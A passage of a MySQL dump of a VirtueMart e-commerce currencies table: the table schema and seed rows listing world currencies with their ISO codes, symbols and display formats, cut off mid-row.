DROP TABLE IF EXISTS `fz6t4_virtuemart_currencies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_currencies` (
  `virtuemart_currency_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `currency_name` varchar(64) DEFAULT NULL,
  `currency_code_2` char(2) DEFAULT NULL,
  `currency_code_3` char(3) DEFAULT NULL,
  `currency_numeric_code` int DEFAULT NULL,
  `currency_exchange_rate` decimal(12,5) DEFAULT NULL,
  `currency_symbol` varchar(8) DEFAULT NULL,
  `currency_decimal_place` varchar(8) DEFAULT NULL,
  `currency_decimal_symbol` varchar(8) DEFAULT NULL,
  `currency_thousands` varchar(8) DEFAULT NULL,
  `currency_positive_style` varchar(64) DEFAULT NULL,
  `currency_negative_style` varchar(64) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '1',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_currency_id`),
  UNIQUE KEY `currency_code_3` (`currency_code_3`),
  KEY `ordering` (`ordering`),
  KEY `published` (`published`),
  KEY `shared` (`shared`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `currency_name` (`currency_name`),
  KEY `currency_numeric_code` (`currency_numeric_code`)
) ENGINE=MyISAM AUTO_INCREMENT=202 DEFAULT CHARSET=utf8mb3 COMMENT='Used to store currencies';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_currencies`
--

LOCK TABLES `fz6t4_virtuemart_currencies` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_currencies` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_currencies` VALUES (2,1,'United Arab Emirates dirham','','AED',784,0.00000,'د.إ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,1,'Albanian lek','','ALL',8,0.00000,'Lek','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,1,'Netherlands Antillean gulden','','ANG',532,0.00000,'ƒ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,1,'Argentine peso','','ARS',32,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,1,'Australian dollar','','AUD',36,0.00000,'$','2','.','','{symbol} {number}','{sign}{symbol} {number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(10,1,'Aruban florin','','AWG',533,0.00000,'ƒ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(11,1,'Barbadian dollar','','BBD',52,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(12,1,'Bangladeshi taka','','BDT',50,0.00000,'৳','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,1,'Bahraini dinar','','BHD',48,0.00000,'ب.د','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,1,'Burundian franc','','BIF',108,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,1,'Bermudian dollar','','BMD',60,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(18,1,'Brunei dollar','','BND',96,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(19,1,'Bolivian boliviano','','BOB',68,0.00000,'$b','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(20,1,'Brazilian real','','BRL',986,0.00000,'R$','2',',','.','{symbol} {number}','{symbol} {sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(21,1,'Bahamian dollar','','BSD',44,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(22,1,'Bhutanese ngultrum','','BTN',64,0.00000,'BTN','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(24,1,'Botswana pula','','BWP',72,0.00000,'P','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(25,1,'Belize dollar','','BZD',84,0.00000,'BZ$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(26,1,'Canadian dollar','','CAD',124,0.00000,'$','2','.',',','{symbol}{number}','{symbol}{sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(27,1,'Swiss franc','','CHF',756,0.00000,'CHF','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(28,1,'Unidad de Fomento','','CLF',990,0.00000,'CLF','0',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(29,1,'Chilean peso','','CLP',152,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(30,1,'Chinese renminbi yuan','','CNY',156,0.00000,'元','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(31,1,'Colombian peso','','COP',170,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(32,1,'Costa Rican colón','','CRC',188,0.00000,'₡','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(33,1,'Czech koruna','','CZK',203,0.00000,'Kč','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(34,1,'Cuban peso','','CUP',192,0.00000,'₱','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(35,1,'Cape Verdean escudo','','CVE',132,0.00000,'$','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(40,1,'Danish krone','','DKK',208,0.00000,'kr','2','.',',','{symbol}{number}','{symbol}{sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(41,1,'Dominican peso','','DOP',214,0.00000,'RD$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(42,1,'Algerian dinar','','DZD',12,0.00000,'د.ج','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(44,1,'Egyptian pound','','EGP',818,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(46,1,'Ethiopian birr','','ETB',230,0.00000,'ETB','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(47,1,'Euro','','EUR',978,0.00000,'€','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(49,1,'Fijian dollar','','FJD',242,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(50,1,'Falkland pound','','FKP',238,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(52,1,'British pound','','GBP',826,0.00000,'£','2','.',',','{symbol}{number}','{symbol}{sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(54,1,'Gibraltar pound','','GIP',292,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(55,1,'Gambian dalasi','','GMD',270,0.00000,'D','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(56,1,'Guinean franc','','GNF',324,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(58,1,'Guatemalan quetzal','','GTQ',320,0.00000,'Q','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(60,1,'Guyanese dollar','','GYD',328,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(61,1,'Hong Kong dollar','','HKD',344,0.00000,'元','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(62,1,'Honduran lempira','','HNL',340,0.00000,'L','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(63,1,'Haitian gourde','','HTG',332,0.00000,'G','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(64,1,'Hungarian forint','','HUF',348,0.00000,'Ft','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(65,1,'Indonesian rupiah','','IDR',360,0.00000,'Rp','0','','','{symbol}{number}','{symbol}{sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(67,1,'Israeli new sheqel','','ILS',376,0.00000,'₪','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(68,1,'Indian rupee','','INR',356,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(69,1,'Iraqi dinar','','IQD',368,0.00000,'ع.د','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(70,1,'Iranian rial','','IRR',364,0.00000,'﷼','2',',','','{number} {symbol}','{sign}{number}{symb0l}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(73,1,'Jamaican dollar','','JMD',388,0.00000,'J$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(74,1,'Jordanian dinar','','JOD',400,0.00000,'د.ا','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(75,1,'Japanese yen','','JPY',392,0.00000,'¥','0',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(76,1,'Kenyan shilling','','KES',404,0.00000,'Sh','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(77,1,'Cambodian riel','','KHR',116,0.00000,'៛','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(78,1,'Comorian franc','','KMF',174,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(79,1,'North Korean won','','KPW',408,0.00000,'₩','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(80,1,'South Korean won','','KRW',410,0.00000,'₩','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(81,1,'Kuwaiti dinar','','KWD',414,0.00000,'د.ك','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(82,1,'Cayman Islands dollar','','KYD',136,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(83,1,'Lao kip','','LAK',418,0.00000,'₭','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(84,1,'Lebanese pound','','LBP',422,0.00000,'£','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(85,1,'Sri Lankan rupee','','LKR',144,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(86,1,'Liberian dollar','','LRD',430,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(87,1,'Lesotho loti','','LSL',426,0.00000,'L','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(89,1,'Libyan dinar','','LYD',434,0.00000,'ل.د','3',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(90,1,'Moroccan dirham','','MAD',504,0.00000,'د.م.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(92,1,'Mongolian tögrög','','MNT',496,0.00000,'₮','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(93,1,'Macanese pataca','','MOP',446,0.00000,'P','1',',','','{symbol}{number}','{symbol}{sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(94,1,'Mauritanian ouguiya','','MRO',478,0.00000,'UM','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(96,1,'Mauritian rupee','','MUR',480,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(97,1,'Maldivian rufiyaa','','MVR',462,0.00000,'ރ.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(98,1,'Malawian kwacha','','MWK',454,0.00000,'MK','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(100,1,'Malaysian ringgit','','MYR',458,0.00000,'RM','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(102,1,'Nigerian naira','','NGN',566,0.00000,'₦','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(105,1,'Norwegian krone','','NOK',578,0.00000,'kr','2',',','','{symbol}{number}','{symbol}{sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(106,1,'Nepalese rupee','','NPR',524,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(107,1,'New Zealand dollar','','NZD',554,0.00000,'$','2',',','','{number} {symbol}','{symbol}{sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(108,1,'Omani rial','','OMR',512,0.00000,'﷼','3','.','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(109,1,'Panamanian balboa','','PAB',590,0.00000,'B/.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(110,1,'Peruvian nuevo sol','','PEN',604,0.00000,'S/.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(111,1,'Papua New Guinean kina','','PGK',598,0.00000,'K','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(112,1,'Philippine peso','','PHP',608,0.00000,'₱','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(113,1,'Pakistani rupee','','PKR',586,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(114,1,'Polish Złoty','','PLN',985,0.00000,'zł','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(116,1,'Paraguayan guaraní','','PYG',600,0.00000,'₲','0','','.','{symbol} {number}','{symbol} {sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(117,1,'Qatari riyal','','QAR',634,0.00000,'﷼','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(118,1,'Romanian leu','','RON',946,0.00000,'lei','2',',','.','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(119,1,'Rwandan franc','','RWF',646,0.00000,'Fr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(120,1,'Saudi riyal','','SAR',682,0.00000,'﷼','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(121,1,'Solomon Islands dollar','','SBD',90,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(122,1,'Seychellois rupee','','SCR',690,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(124,1,'Swedish krona','','SEK',752,0.00000,'kr','2',',','.','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(125,1,'Singapore dollar','','SGD',702,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(126,1,'Saint Helenian pound','','SHP',654,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(127,1,'Sierra Leonean leone','','SLL',694,0.00000,'Le','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(128,1,'Somali shilling','','SOS',706,0.00000,'S','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(130,1,'São Tomé and Príncipe dobra','','STD',678,0.00000,'Db','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(131,1,'Russian ruble','','RUB',643,0.00000,'руб','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(132,1,'Salvadoran colón','','SVC',222,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(133,1,'Syrian pound','','SYP',760,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(134,1,'Swazi lilangeni','','SZL',748,0.00000,'L','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(135,1,'Thai baht','','THB',764,0.00000,'฿','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(136,1,'Tunisian dinar','','TND',788,0.00000,'د.ت','3',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(137,1,'Tongan paʻanga','','TOP',776,0.00000,'T$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(139,1,'Turkish new lira','','TRY',949,0.00000,'YTL','2',',','.','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(140,1,'Trinidad and Tobago dollar','','TTD',780,0.00000,'TT$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(141,1,'New Taiwan dollar','','TWD',901,0.00000,'NT$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(142,1,'Tanzanian shilling','','TZS',834,0.00000,'Sh','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(144,1,'United States dollar','','USD',840,0.00000,'$','2','.',',','{symbol}{number}','{symbol}{sign}{number}',0,0,1,'0000-00-00 00:00:00',0,'2017-11-05 11:36:29',676,'0000-00-00 00:00:00',0),(147,1,'Vietnamese Dong','','VND',704,0.00000,'₫','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(148,1,'Vanuatu vatu','','VUV',548,0.00000,'Vt','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(149,1,'Samoan tala','','WST',882,0.00000,'T','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(151,1,'Yemeni rial','','YER',886,0.00000,'﷼','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(152,1,'Serbian dinar','','RSD',941,0.00000,'Дин.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(153,1,'South African rand','','ZAR',710,0.00000,'R','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(154,1,'Zambian kwacha','','ZMK',894,0.00000,'ZK','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(156,1,'Zimbabwean dollar','','ZWD',932,0.00000,'Z$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(158,1,'Armenian dram','','AMD',51,0.00000,'դր.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(159,1,'Myanmar kyat','','MMK',104,0.00000,'K','2',',','','{number} {symbol}','{symbol} {sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(160,1,'Croatian kuna','','HRK',191,0.00000,'kn','2',',','.','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(161,1,'Eritrean nakfa','','ERN',232,0.00000,'Nfk','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(162,1,'Djiboutian franc','','DJF',262,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(163,1,'Icelandic 